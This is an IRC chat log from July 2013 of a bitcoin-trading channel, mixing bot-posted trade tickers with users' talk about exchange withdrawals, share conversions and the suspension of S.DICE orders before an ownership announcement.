@ 0.042211 = 0.5487 BTC [-] Jul 17 23:48:01 Damn Jul 17 23:48:48 Totally forgot I had a basic order still in there Jul 17 23:48:59 burnside hurry up and confirm withdrawals god dammit Jul 17 23:51:31 [BTCTC] [DMS.MINING] 1 @ 0.015989 BTC [+] Jul 17 23:54:17 [BTCTC] [COGNITIVE] 1 @ 0.994 BTC [+] Jul 17 23:54:19 [HAVELOCK] [AM100] 12 @ 0.041942 = 0.5033 BTC [+] Jul 17 23:54:20 [HAVELOCK] [AM100] 144 @ 0.041942 = 6.0396 BTC [+] Jul 17 23:54:22 [HAVELOCK] [AM100] 45 @ 0.041943 = 1.8874 BTC [+] Jul 17 23:54:23 [HAVELOCK] [AM100] 11 @ 0.04194888 = 0.4614 BTC [+] Jul 17 23:55:06 ericmuyser, did you know that Havelock only requires 3 confirms for depsits and no manual withdrawals Jul 17 23:55:22 and that TAT pays divs faster than anyone ;) Jul 17 23:55:37 [HAVELOCK] [SDSTM] 1 @ 0.011 BTC [+] Jul 17 23:56:14 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 17 23:56:14 ftfy: TAT pays AM divs faster than anyone Jul 17 23:56:34 well i pay TAT.VM divs faster than anyone too Jul 17 23:56:36 ThickAsThieves: yah i'm in the process of switching to havelock now. 17 hours still not withdrawn... fuck this Jul 17 23:56:36 hehe Jul 17 23:56:55 maybe burnside wiats for mircea too Jul 17 23:57:00 ThickAsThieves: didn't know about confirms, thanks :) Jul 17 23:57:11 plus no fee to buy the shares Jul 17 23:57:16 correct Jul 17 23:57:17 and Jul 17 23:57:28 i can convert AM-PTs to AM1s Jul 17 23:57:30 no fee Jul 17 23:58:13 oh shit really Jul 17 23:58:16 yep Jul 17 23:58:20 no friedcat either Jul 17 23:58:26 how do? Jul 17 23:58:42 you just push your AM-PTs to TATInvestments Jul 17 23:58:51 and email me from your Havelock account email Jul 17 23:58:55 confirming the import Jul 17 23:59:13 wait for your divs though Jul 17 23:59:36 can I move my BTC TC TAT.ASICMINER to AM100s too? Jul 17 23:59:56 what do you mean push my AM-PTs? I don't think BTC TC has a fund transfer, just btc transfer Jul 18 00:00:06 it has fund xfer too Jul 18 00:00:12 bottom of Portfolio page Jul 18 00:00:27 i do not do AM100/TAT.AM moves Jul 18 00:00:41 not for now at least Jul 18 00:00:44 no one ever asks Jul 18 00:00:54 but maybe for a fee i would add the service Jul 18 00:00:59 just need to think about it Jul 18 00:01:29 problem is, in Havelock, my issuer fees are by market cap Jul 18 00:01:39 so it actually costs me to have more shares there Jul 18 00:01:55 so moving TAT.AM there gets tricky Jul 18 00:02:04 what's your email? Jul 18 00:02:09 i'll pm it Jul 18 00:03:50 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004195 BTC [-] Jul 18 00:04:28 [BTCTC] [DMS.PURCHASE] 1 @ 0.039759 BTC [+] Jul 18 00:05:45 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004195 = 0.0084 BTC [-] Jul 18 00:05:47 okay, it looks like Havelock and I will be able to work something out for TAT.AM imports too Jul 18 00:05:52 to AM100 Jul 18 00:06:04 I just need to make a policy for minimums, etc Jul 18 00:06:29 so i dont spend all day pushing itty-bitty arb requests around Jul 18 00:06:41 ThickAsThieves: lost my connection sorry, email? Jul 18 00:06:44 ah Jul 18 00:06:47 [BTCTC] [DMS.SELLING] 4 @ 0.024849 = 0.0994 BTC [+] Jul 18 00:06:49 [17:02] i'll pm it Jul 18 00:09:24 [BTCTC] [DMS.SELLING] 4 @ 0.024849 = 0.0994 BTC [+] Jul 18 00:09:32 [BTCTC] [TAT.ASICMINER] 50 @ 0.042106 = 2.1053 BTC [-] Jul 18 00:09:34 [BTCTC] [TAT.ASICMINER] 25 @ 0.042105 = 1.0526 BTC [-] Jul 18 00:10:58 [BTCTC] [TAT.ASICMINER] 15 @ 0.042106 = 0.6316 BTC [+] Jul 18 00:11:41 [HAVELOCK] [AM100] 1 @ 0.04182 BTC [-] Jul 18 00:16:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.042763 BTC [+] Jul 18 00:17:13 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 18 00:20:22 [BTCTC] [BFMINES] 5 @ 0.003999 = 0.02 BTC [+] Jul 18 00:23:11 ;;nethash Jul 18 00:23:11 221818.665317 Jul 18 00:23:17 ;;bcstats Jul 18 00:23:21 Current Blocks: 247095 | Current Difficulty: 2.61628756825699E7 | Next Difficulty At Block: 247967 | Next Difficulty In: 872 blocks | Next Difficulty In About: 5 days, 0 hours, 58 minutes, and 15 seconds | Next Difficulty Estimate: 30239132.3036 | Estimated Percent Change: 15.58031 Jul 18 00:24:04 [BTCTC] [S.MPOE-PT] 2 @ 0.000882 = 0.0018 BTC [+] Jul 18 00:24:27 ok, all s.dice orders cancelled pending announcement from management. Jul 18 00:24:50 oh snap Jul 18 00:24:52 ruh oh? Jul 18 00:24:53 today? Jul 18 00:25:01 yee Jul 18 00:25:02 dice drama Jul 18 00:25:06 yay Jul 18 00:25:08 good announcement or bad announcement? Jul 18 00:25:29 let's speculate! Jul 18 00:25:47 1. SDICE is going private Jul 18 00:25:52 2. SDICE sold Jul 18 00:26:00 jurov it was done already or not ? Jul 18 00:26:01 3. SDICE is folding Jul 18 00:26:02 as a betting man, i'm guessing … bad Jul 18 00:26:09 4. SDICE is kicked off MPEX Jul 18 00:26:25 hehe, or merged with jd Jul 18 00:26:35 where should we be looking for the official announcement? Jul 18 00:26:48 prolly a really neat new website comign in 4-6 weeks Jul 18 00:26:53 2 weeks Jul 18 00:26:56 obv Jul 18 00:27:26 all bitcoin milestones are 2 weeks away Jul 18 00:27:27 [BTCTC] [S.MPOE-PT] 2 @ 0.000825 = 0.0017 BTC [-] Jul 18 00:27:32 mircea_popescu: the withdrawals? one arrived, but i added several new ones Jul 18 00:27:35 it's just a matter of how many 2 weeks Jul 18 00:27:50 5. Coinroll buys SDICE Jul 18 00:27:50 [BTCTC] [ASICMINER-PT] 1 @ 4.446999 BTC [+] Jul 18 00:27:58 gonna go with 5 Jul 18 00:28:26 6. SDICE and Coinroll have simultaneous orgasm while mating and die at the same time Jul 18 00:28:46 winklevoss etf buys controlling interest Jul 18 00:29:00 that would fall under #2 Jul 18 00:29:03 but good one Jul 18 00:29:05 :) Jul 18 00:29:12 jurov a ok, they;'ll come then! Jul 18 00:29:28 toffoo knowing erik prolly he makes it on the forum Jul 18 00:29:46 is it expected today then? Jul 18 00:30:03 yea, couple hours or w/e Jul 18 00:30:06 where is official thread? sec forum or services? Jul 18 00:30:07 I like #1 if all orders are cancelled. Jul 18 00:30:12 ok thanks Jul 18 00:30:25 He must be getting sick of the beratings he gets on the forums Jul 18 00:30:29 or scam accusations Jul 18 00:30:33 I wonder if he's _that_ sick of it Jul 18 00:30:34 was that huge bid at 0.002 still there before all the orders cancelled? Jul 18 00:30:35 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 18 00:30:49 not #4 since then announcement would be from mpex Jul 18 00:31:32 The huge bid at 0.002 was half sold into Jul 18 00:31:39 seems cancelled orders would mean delisting Jul 18 00:31:46 From 900k and dust to 400k and dust Jul 18 00:32:24 or a forced buyback Jul 18 00:32:24 but why! Jul 18 00:32:30 If that's even in his contract Jul 18 00:32:56 ev bored, moving on to bigger and better scams Jul 18 00:32:59 coinbr users: your s.dice orders are in "fubar" status, will be properly canceled shortly Jul 18 00:33:15 A. Do nothing, make a few mistakes before a big launch, let share price drop really really low. B. Buyback shares at low price. C. Launch major new features Jul 18 00:34:17 5. MPEx buys SDICE, self manages Jul 18 00:34:27 kakobrekla gets raise Jul 18 00:34:52 s.mg buys it moar liek Jul 18 00:35:00 hmm Jul 18 00:35:17 then it wouldn't be a forum ann either Jul 18 00:35:19 but idk why cancel orders Jul 18 00:35:30 because new IPO Jul 18 00:35:35 or no IPO Jul 18 00:35:39 safe to say reptillians are involved Jul 18 00:35:56 lol Jul 18 00:36:06 well cancelled orders because information ass-ymetry Jul 18 00:36:41 suspended would be saner approach in that case? Jul 18 00:37:13 i don't believe in getting in people's way. if they WANT to trade they should be able to Jul 18 00:37:14 i like the S.MG buys S.DICE option best Jul 18 00:37:17 the idea is to not get blindsided Jul 18 00:37:37 since i own S.MG but no S.DICE Jul 18 00:37:40 :) Jul 18 00:37:45 and it just feels cooler Jul 18 00:37:48 right, so new orders can be placed nao? Jul 18 00:37:51 Generally, unless people are going to get screwed over, the trading would be allowed to continue, no? Jul 18 00:38:09 well good news or bad news screws someone over Jul 18 00:38:16 parseval_ that's the idea. Jul 18 00:38:22 dub yea Jul 18 00:38:34 lol Jul 18 00:38:46 so orders are cleared, but trading is not halted Jul 18 00:38:57 ? Jul 18 00:39:22 Whut? Odd Jul 18 00:39:32 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19999 BTC [+] Jul 18 00:40:58 Well, at least the site still works :) Jul 18 00:41:29 new orders are in lol Jul 18 00:41:29 http://mpex.co/?mpsic=S.DICE Jul 18 00:41:35 S.DICE last 489450@0.00200000 Jul 18 00:41:48 nice Jul 18 00:41:58 i made a buy 1 share at maket price Jul 18 00:42:00 nothing happend Jul 18 00:42:11 all trace of it gone Jul 18 00:45:16 You should try again Jul 18 00:45:29 ThickAsThieves yes. Jul 18 00:46:26 kakobrekla if you buy at market and there's no market the order just gets ignored Jul 18 00:46:37 ignored. Jul 18 00:46:39 im used to that. Jul 18 00:46:46 [BTCTC] [TAT.ASICMINER] 25 @ 0.042114 = 1.0529 BTC [-] Jul 18 00:46:48 lol Jul 18 00:46:57 well wwjd! Jul 18 00:47:31 "MPEx rejected cancellation of this order. Please retry in few minutes." Jul 18 00:47:35 from coinbr Jul 18 00:47:54 well at least we got a FZB update from him today … more "words": https://bitcointalk.org/index.php?topic=82866.msg2750645#msg2750645 Jul 18 00:48:14 [BTCTC] [BASIC-MINING] 1 @ 0.73998 BTC [+] Jul 18 00:48:22 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 18 00:48:54 FZB is like a billion time more valuable than SD, of course. Jul 18 00:49:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.042744 BTC [+] Jul 18 00:50:51 [BTCTC] [BASIC-MINING] 2 @ 0.74 = 1.48 BTC [+] Jul 18 00:50:53 [BTCTC] [BASIC-MINING] 4 @ 0.749996 = 3 BTC [+] Jul 18 00:50:53 [BTCTC] [BASIC-MINING] 4 @ 0.749996 = 3 BTC [+] Jul 18 00:51:32 [BTCTC] [BASIC-MINING] 1 @ 0.749996 BTC [+] Jul 18 00:51:36 ThickAsThieves: yes, mpex does such things. alt broker implementations are in for some nasty surprises Jul 18 00:51:42 [HAVELOCK] [AM1] 1 @ 4.55 BTC [+] Jul 18 00:51:51 [HAVELOCK] [AM1] 1 @ 4.55 BTC [+] Jul 18 00:51:53 [BTCTC] [BASIC-MINING] 1 @ 0.749996 BTC [+] Jul 18 00:52:26 [BTCTC] [BASIC-MINING] 1 @ 0.749997 BTC [+] Jul 18 00:52:55 not quite sure what that means but I assume you mean that coinbr doesn't fully mirror mpex in every way, so limitations happen Jul 18 00:53:03 [BTCTC] [AMC-PT] 20 @ 0.0025 = 0.05 BTC [+] Jul 18 00:53:17 no. i mean mepx really did reject to cancel your order Jul 18 00:53:25 [BTCTC] [BASIC-MINING] 4 @ 0.75 = 3 BTC [+] Jul 18 00:53:26 the order i'm trying to cancel is not a big deal, but it's also not SDICE Jul 18 00:53:29 and told you to come back later Jul 18 00:53:40 as a glitch or? Jul 18 00:53:54 no, as a thing. Jul 18 00:54:18 will more info be forthcoming today? Jul 18 00:54:40 more info on what you mean ? Jul 18 00:54:47 [HAVELOCK] [AM100] 1 @ 0.0413 BTC [-] Jul 18 00:54:49 [HAVELOCK] [AM100] 20 @ 0.04120101 = 0.824 BTC [-] Jul 18 00:54:50 [HAVELOCK] [AM100] 50 @ 0.0412 = 2.06 BTC [-] Jul 18 00:54:51 [HAVELOCK] [AM100] 20 @ 0.0411 = 0.822 BTC [-] Jul 18 00:54:51 [HAVELOCK] [AM100] 29 @ 0.0411 = 1.1919 BTC [-] Jul 18 00:54:53 [HAVELOCK] [AM100] 338 @ 0.04105 = 13.8749 BTC [-] Jul 18 00:54:54 [HAVELOCK] [AM100] 129 @ 0.04100002 = 5.289 BTC [-] Jul 18 00:54:58 on why my order is frozen Jul 18 00:55:11 it's not frozen, you just try again Jul 18 00:55:38 why so mysterious then... Jul 18 00:55:51 I told you, reptillians Jul 18 00:56:00 Hey my order won't cancel. Try again like it says, idiot. Jul 18 00:56:09 but it's not mysterious, this has been discussed to death. mpex's chief anti-eft measure is you don't have the guarantee you can insta-cancel orders. Jul 18 00:56:30 anti-hft i mean not eft. Jul 18 00:57:23 hmm so this is cuz coinbr running from one account triggers hft prevention schemes sometimes? Jul 18 00:57:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.042735 = 0.0855 BTC [-] Jul 18 00:57:51 probably. nothing to get excited over, just count to ten and recancel Jul 18 00:58:00 word Jul 18 00:58:01 thx Jul 18 00:58:04 np np Jul 18 00:59:07 [HAVELOCK] [SDICE] 2 @ 0.241 = 0.482 BTC [-] Jul 18 00:59:23 [MPEX] [S.MG] 444 @ 0.0002475 = 0.1099 BTC [+] Jul 18 00:59:55 The exact reply coinbr got from mpex is: Your order #XXXXXXXX can not be cancelled at this time. Please issue a STAT to make sure the order # is correct and try again! Jul 18 00:59:56 [BTCTC] [DMS.PURCHASE] 344 @ 0.039759 = 13.6771 BTC [+] Jul 18 01:00:15 and i just checked the # is there Jul 18 01:00:20 sounds about right Jul 18 01:02:11 [BTCTC] [DMS.MINING] 5 @ 0.0159 = 0.0795 BTC [-] Jul 18 01:02:17 [BTCTC] [B.YABMC] 3 @ 0.002549 = 0.0076 BTC [+] Jul 18 01:03:06 wtf is Dooglus doing? https://bitcointalk.org/index.php?topic=242962.msg2751123#msg2751123 Jul 18 01:04:02 That goes against logic. No such thing as being "lucky" and beating the house edge. Jul 18 01:04:35 Unless he's not sure his website was coded properly and might be faulty. Jul 18 01:05:04 either way he is showing poor mgmt skills Jul 18 01:05:07 uh Jul 18 01:08:16 did you see that guy play Jul 18 01:08:20 it was insane Jul 18 01:09:20 yeah jborkl Jul 18 01:09:46 but the winnings were within expected variance i heard Jul 18 01:11:03 the guy was placing such large bets, either he was going to win big or go home Jul 18 01:11:05 [BitFunder][CoinBr.iDiff-O] PAID 0.26162875 Jul 18 01:11:10 ^ ThickAsThieves Jul 18 01:12:07 He seems to show a poor understanding of variance if this guy is consistently martingaling successfully with the current jd limits Jul 18 01:13:04 hm, is jd investment/withdrawal instant? if yes, i can see some space for abuse there Jul 18 01:13:19 well, it depended on which 30 seconds you looked at - Jul 18 01:13:38 Jurov , I walked away with 45 bitcoins today from that Jul 18 01:13:43 jurov, investing/divesting is Jul 18 01:14:53 yes that's what i meant Jul 18 01:18:24 [BTCTC] [TAT.ASICMINER] 9 @ 0.042722 = 0.3845 BTC [-] Jul 18 01:18:40 [BTCTC] [BASIC-MINING] 1 @ 0.75 BTC [+] Jul 18 01:20:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.04272 = 0.4272 BTC [-] Jul 18 01:20:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.042721 = 0.4272 BTC [+] Jul 18 01:20:28 [BTCTC] [TAT.ASICMINER] 50 @ 0.042767 = 2.1384 BTC [+] Jul 18 01:21:30 Thanks jurov Jul 18 01:22:35 jurov pretty mucxh instant afaik Jul 18 01:23:14 [HAVELOCK] [AM100] 1 @ 0.041699 BTC [+] Jul 18 01:23:36 jborkl you made 45btc from justdice or iDiffs? Jul 18 01:23:50 justdice Jul 18 01:24:11 [HAVELOCK] [AM100] 100 @ 0.041699 = 4.1699 BTC [+] Jul 18 01:24:34 mainly investing/ divesting as the crazy guy won\lost Jul 18 01:24:48 jbork1 did you automate the invest/divest button to make money somehow on whales? Jul 18 01:25:00 no, just was watching the show Jul 18 01:25:26 [MPEX] [S.MPOE] 13906 @ 0.00088185 = 12.263 BTC [+] Jul 18 01:25:40 bummer, I was almost already shopping for a ferrari Jul 18 01:26:54 noaccess: that's kinda bullshit Jul 18 01:27:01 noaccess: just wait a while and buy used one from goat Jul 18 01:27:04 a whale can lose just as easily as it can win Jul 18 01:27:26 Total time logged in: 100 days, 23 minutes. Jul 18 01:27:34 totally bad for my health. Jul 18 01:27:39 That whale was winning and losing. just depended on the second you looked Jul 18 01:28:24 100 days on the forum Jul 18 01:28:27 I was thinking (still am) about the size of the house just after a loss. Jul 18 01:28:27 ? Jul 18 01:28:34 yes :( Jul 18 01:28:45 ohh, that is bad for your health Jul 18 01:29:57 jesus. Jul 18 01:30:04 100 days you'll never get back. Jul 18 01:30:59 Dante's Inferno - 100 days on the forum Jul 18 01:31:04 :( Jul 18 01:32:55 I'm at 40 days Jul 18 01:32:56 O.o mircea_popescu, pls ask mpoe-pr how many days does she have Jul 18 01:33:11 haha ok. Jul 18 01:33:15 i'm at 12 days, 12 hours and 22 minutes. Jul 18 01:33:28 i imagine she must be way up there Jul 18 01:33:49 im at.... fucked. Jul 18 01:33:52 20 days and 21 hours Jul 18 01:34:17 [HAVELOCK] [AM100] 6 @ 0.041699 = 0.2502 BTC [+] Jul 18 01:34:56 7 days! Jul 18 01:35:09 noob Jul 18 01:35:22 member since aug 2011 Jul 18 01:35:31 i guess aknap3 wins Jul 18 01:35:45 [HAVELOCK] [AM1] 1 @ 4.55 BTC [+] Jul 18 01:35:45 username: fently Jul 18 01:35:49 [BTCTC] [ASICMINER-PT] 2 @ 4.439999 = 8.88 BTC [+] Jul 18 01:37:12 ... going back to ignoring IRC for another week or so :) Jul 18 01:37:28 the sdice suspense is killing me Jul 18 01:37:41 this means it will be boring news Jul 18 01:38:30 [BTCTC] [ASICMINER-PT] 2 @ 4.2 = 8.4 BTC [-] Jul 18 01:38:34 "We are blocking Papua New Guinea, because pygmies" Jul 18 01:40:17 lol darn Jul 18 01:40:20 i should have thought of that. **** ENDING LOGGING AT Thu Jul 18 01:55:36 2013 **** BEGIN LOGGING AT Thu Jul 18 01:56:01 2013 Jul 18 01:56:17 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 18 01:57:52 hello Guest7869 Jul 18 01:58:23 mircea revealed his IP Jul 18 01:58:26 mwahahaha Jul 18 01:58:42 it's in his noob post too I think **** ENDING LOGGING AT Thu Jul 18 01:58:58 2013 **** BEGIN LOGGING AT Thu Jul 18 02:00:25 2013 Jul 18 02:00:33 Scrat lol Jul 18 02:01:04 [BTCTC] [AMC-PT] 255 @ 0.0025 = 0.6375 BTC [+] Jul 18 02:01:51 Snookers: TAT knows and he is teasing us Jul 18 02:02:00 yes, I bought sdice with MJR and we're gonna change it to only accept decepticoins Jul 18 02:02:00 Hi mircea what happend with sdice on mpex? Jul 18 02:02:21 jurov : "anyway you can tell jurov i have 10,640 day Jul 18 02:02:21 no wai ?! over 10k ? Jul 18 02:02:21 i'm old bebbeh" Jul 18 02:02:28 sooo... she's more than the sum of all of youy ?! Jul 18 02:02:35 ;;tslb Jul 18 02:02:37 Time since last block: 11 seconds Jul 18 02:02:50 impossibley Jul 18 02:02:52 Snookers Jul 18 00:24:27 ok, all s.dice orders cancelled pending announcement from management. Jul 18 02:03:04 Did Eric perform a share buy back? Jul 18 02:03:48 i don't have a further comment. Jul 18 02:04:47 [BTCTC] [DMS.SELLING] 20 @ 0.023101 = 0.462 BTC [-] Jul 18 02:04:54 Mircea do you know when announcement will be Jul 18 02:05:27 [BTCTC] [DMS.SELLING] 9 @ 0.0231 = 0.2079 BTC [-] Jul 18 02:05:45 [BTCTC] [DMS.SELLING] 43 @ 0.02304 = 0.9907 BTC [-] Jul 18 02:06:10 [BTCTC] [DMS.SELLING] 60 @ 0.02303 = 1.3818 BTC [-] Jul 18 02:06:41 [BTCTC] [DMS.SELLING] 66 @ 0.023 = 1.518 BTC [-] Jul 18 02:06:43 [BTCTC] [DMS.SELLING] 10 @ 0.023 = 0.23 BTC [-] Jul 18 02:07:08 [BTCTC] [DMS.SELLING] 31 @ 0.022987 = 0.7126 BTC [-] Jul 18 02:07:27 [BTCTC] [BASIC-MINING] 1 @ 0.72 BTC [-] Jul 18 02:08:02 [BTCTC] [DMS.MINING] 4 @ 0.0151 = 0.0604 BTC [-] Jul 18 02:08:14 [BTCTC] [BASIC-MINING] 1 @ 0.710002 BTC [-] Jul 18 02:08:16 It's an announcement about how they're closing shop while they'll be running with never before seen profit while the website appears upside down on the opposite side of screens. Sounds about right. Jul 18 02:08:29 [BTCTC] [DMS.MINING] 2 @ 0.015 = 0.03 BTC [-] Jul 18 02:08:55 Huh? Jul 18 02:09:36 I'm claiming it will probably be nonsense. Jul 18 02:09:44 Honestly, no clue... Jul 18 02:10:31 Namworld do you know why bitinstant is down Jul 18 02:10:58 but might as well be something like "SD will have a kiosk at that event. Yes, I never go publicly representing SD anymore, but fuck it!" Jul 18 02:11:03 they had to close it to have time to run their new gambling company Jul 18 02:11:22 or another unimpactful announcement where they still don't get account based playing or developments for the website. Jul 18 02:11:41 BitInstant? No idea, never really look into that. Jul 18 02:12:09 [HAVELOCK] [AM100] 1 @ 0.041659 BTC [-] Jul 18 02:12:15 Snookers should be today Jul 18 02:12:25 [BTCTC] [ASICMINER-PT] 1 @ 4.350002 BTC [-] Jul 18 02:14:06 SDice must still be profitable, it ate two 50 btc bets I made.. Jul 18 02:15:15 What happen with sdice? Jul 18 02:15:51 ok, all s.dice orders cancelled pending announcement from management. Jul 18 02:16:01 announcement today probably Jul 18 02:16:05 [BTCTC] [RSM] 30 @ 0.0199 = 0.597 BTC [-] Jul 18 02:16:08 no other details Jul 18 02:16:31 [BTCTC] [RSM] 83 @ 0.02 = 1.66 BTC [+] Jul 18 02:16:32 [BTCTC] [RSM] 100 @ 0.02 = 2 BTC [+] Jul 18 02:17:07 Does anyone think mtgox does not survive the summer? Jul 18 02:17:13 oh yeah one more option Jul 18 02:17:14 6. Erik is in prison Jul 18 02:17:32 [HAVELOCK] [AM100] 10 @ 0.04137396 = 0.4137 BTC [-] Jul 18 02:17:45 For what Jul 18 02:18:02 impersonating a manager Jul 18 02:18:06 he's not in prison lol. i was just talking to him Jul 18 02:18:15 [BTCTC] [AMC-PT] 30 @ 0.0025 = 0.075 BTC [+] Jul 18 02:18:28 corporate espionage Jul 18 02:18:34 some prisons have internets Jul 18 02:18:40 i guess they do... Jul 18 02:18:42 Mircea any update on s mg Jul 18 02:18:45 lol ThickAsThieves Jul 18 02:18:57 Snookers the last one is http://trilema.com/2013/15th-blown-other-statements/#comment-93968 Jul 18 02:18:58 Didn't think you would be one to miss deadlines Jul 18 02:19:43 nice spread on sdice Jul 18 02:20:01 https://bitcointalk.org/index.php?topic=101902.msg2751536#msg2751536 Jul 18 02:20:07 S.DICE - SatoshiDICE 100% Dividend-Paying Asset on MPEx Jul 18 02:22:04 Thank you. Jul 18 02:22:13 Any info about the new owners? Jul 18 02:22:26 or whether they will IPO? Jul 18 02:22:50 this guy's a fast reader Jul 18 02:24:11 [HAVELOCK] [SDICE] 130 @ 0.241 = 31.33 BTC [-] Jul 18 02:24:18 lol Jul 18 02:24:21 [HAVELOCK] [SDICE] 10 @ 0.2410001 = 2.41 BTC [+] Jul 18 02:24:32 [HAVELOCK] [SDICE] 11 @ 0.2419 = 2.6609 BTC [+] Jul 18 02:24:39 [HAVELOCK] [SDICE] 10 @ 0.2419 = 2.419 BTC [+] Jul 18 02:24:49 [HAVELOCK] [SDICE] 1 @ 0.24199999 BTC [+] Jul 18 02:24:53 [HAVELOCK] [SDICE] 1 @ 0.24201999 BTC [+] Jul 18 02:24:54 [HAVELOCK] [SDICE] 10 @ 0.2485 = 2.485 BTC [+] Jul 18 02:24:56 [HAVELOCK] [SDICE] 10 @ 0.28 = 2.8 BTC [+] Jul 18 02:24:59 lol Jul 18 02:25:26 is there a way to short HAVELOCK shares? Jul 18 02:25:30 [HAVELOCK] [SDICE] 22 @ 0.31999999 = 7.04 BTC [+] Jul 18 02:25:37 [BTCTC] [S.DICE-PT] 200 @ 0.002399 = 0.4798 BTC [+] Jul 18 02:25:48 easy money? Jul 18 02:25:48 :P Jul 18 02:25:58 [BTCTC] [GSDPT] 95 @ 0.002374 = 0.2255 BTC [+] Jul 18 02:26:00 [HAVELOCK] [SDICE] 50 @ 0.32 = 16 BTC [+] Jul 18 02:26:01 [BTCTC] [GSDPT] 29 @ 0.002375 = 0.0689 BTC [+] Jul 18 02:26:03 [BTCTC] [GSDPT] 23 @ 0.002375 = 0.0546 BTC [+] Jul 18 02:26:04 [BTCTC] [GSDPT] 6 @ 0.002375 = 0.0143 BTC [+] Jul 18 02:26:06 [BTCTC] [GSDPT] 42 @ 0.002375 = 0.0998 BTC [+] Jul 18 02:26:07 [BTCTC] [GSDPT] 3 @ 0.00238 = 0.0071 BTC [+] Jul 18 02:26:11 [BTCTC] [GSDPT] 100 @ 0.00238 = 0.238 BTC [+] Jul 18 02:26:13 [BTCTC] [GSDPT] 250 @ 0.0024 = 0.6 BTC [+] Jul 18 02:26:14 [BTCTC] [GSDPT] 53 @ 0.00241 = 0.1277 BTC [+] Jul 18 02:26:15 [BTCTC] [GSDPT] 88 @ 0.002415 = 0.2125 BTC [+] Jul 18 02:26:17 [BTCTC] [GSDPT] 2 @ 0.00242 = 0.0048 BTC [+] Jul 18 02:26:18 [BTCTC] [GSDPT] 100 @ 0.00245 = 0.245 BTC [+] Jul 18 02:26:19 [BTCTC] [GSDPT] 50 @ 0.00245 = 0.1225 BTC [+] Jul 18 02:26:20 [BTCTC] [GSDPT] 500 @ 0.002499 = 1.2495 BTC [+] Jul 18 02:26:22 [BTCTC] [GSDPT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 18 02:26:23 [BTCTC] [S.DICE-PT] 150 @ 0.0024 = 0.36 BTC [+] Jul 18 02:26:24 [BTCTC] [S.DICE-PT] 75 @ 0.002401 = 0.1801 BTC [+] Jul 18 02:26:25 [BTCTC] [S.DICE-PT] 50 @ 0.002402 = 0.1201 BTC [+] Jul 18 02:26:26 [BTCTC] [S.DICE-PT] 95 @ 0.002404 = 0.2284 BTC [+] Jul 18 02:26:26 [BTCTC] [S.DICE-PT] 150 @ 0.002405 = 0.3608 BTC [+] Jul 18 02:26:28 [BTCTC] [S.DICE-PT] 52 @ 0.002408 = 0.1252 BTC [+] Jul 18 02:26:29 [BTCTC] [S.DICE-PT] 150 @ 0.00241 = 0.3615 BTC [+] Jul 18 02:26:30 [BTCTC] [S.DICE-PT] 1000 @ 0.00242 = 2.42 BTC [+] Jul 18 02:26:31 [BTCTC] [S.DICE-PT] 100 @ 0.002443 = 0.2443 BTC [+] Jul 18 02:26:32 [BTCTC] [S.DICE-PT] 150 @ 0.002448 = 0.3672 BTC [+] Jul 18 02:26:33 [BTCTC] [S.DICE-PT] 400 @ 0.00245 = 0.98 BTC [+] Jul 18 02:26:35 [BTCTC] [S.DICE-PT] 100 @ 0.002475 = 0.2475 BTC [+] Jul 18 02:26:36 [BTCTC] [S.DICE-PT] 100 @ 0.002476 = 0.2476 BTC [+] Jul 18 02:26:37 [BTCTC] [S.DICE-PT] 100 @ 0.002478 = 0.2478 BTC [+] Jul 18 02:26:37 [BTCTC] [S.DICE-PT] 150 @ 0.002479 = 0.3719 BTC [+] Jul 18 02:26:38 [BTCTC] [S.DICE-PT] 300 @ 0.00248 = 0.744 BTC [+] Jul 18 02:26:39 [BTCTC] [S.DICE-PT] 192 @ 0.00248 = 0.4762 BTC [+] Jul 18 02:26:40 [BTCTC] [S.DICE-PT] 800 @ 0.002484 = 1.9872 BTC [+] Jul 18 02:26:41 [BTCTC] [S.DICE-PT] 150 @ 0.002485 = 0.3728 BTC [+] Jul 18 02:26:41 lol shorting seems a litytle suicidal in this context. Jul 18 02:26:42 [BTCTC] [S.DICE-PT] 11 @ 0.00249 = 0.0274 BTC [+] Jul 18 02:26:43 [BTCTC] [S.DICE-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 18 02:26:44 [BTCTC] [S.DICE-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 18 02:26:45 [BTCTC] [S.DICE-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 18 02:26:46 [BTCTC] [S.DICE-PT] 77 @ 0.0025 = 0.1925 BTC [+] Jul 18 02:26:46 [BTCTC] [S.DICE-PT] 25 @ 0.0025 = 0.0625 BTC [+] Jul 18 02:26:47 [BTCTC] [S.DICE-PT] 150 @ 0.002505 = 0.3758 BTC [+] Jul 18 02:26:49 [BTCTC] [S.DICE-PT] 100 @ 0.00251 = 0.251 BTC [+] Jul 18 02:26:50 [BTCTC] [S.DICE-PT] 100 @ 0.00252 = 0.252 BTC [+] Jul 18 02:26:51 [BTCTC] [S.DICE-PT] 1 @ 0.00253 BTC [+] Jul 18 02:26:52 [BTCTC] [S.DICE-PT] 18 @ 0.002545 = 0.0458 BTC [+] Jul 18 02:26:53 [BTCTC] [S.DICE-PT] 100 @ 0.002575 = 0.2575 BTC [+] Jul 18 02:26:54 [BTCTC] [S.DICE-PT] 23 @ 0.00259 = 0.0596 BTC [+] Jul 18 02:26:55 [BTCTC] [S.DICE-PT] 350 @ 0.00259 = 0.9065 BTC [+] Jul 18 02:26:58 [BTCTC] [S.DICE-PT] 100 @ 0.0026 = 0.26 BTC [+] Jul 18 02:27:00 [BTCTC] [S.DICE-PT] 330 @ 0.0026 = 0.858 BTC [+] Jul 18 02:27:00 [BTCTC] [S.DICE-PT] 100 @ 0.00266 = 0.266 BTC [+] Jul 18 02:27:03 [BTCTC] [S.DICE-PT] 233 @ 0.002695 = 0.6279 BTC [+] Jul 18 02:27:05 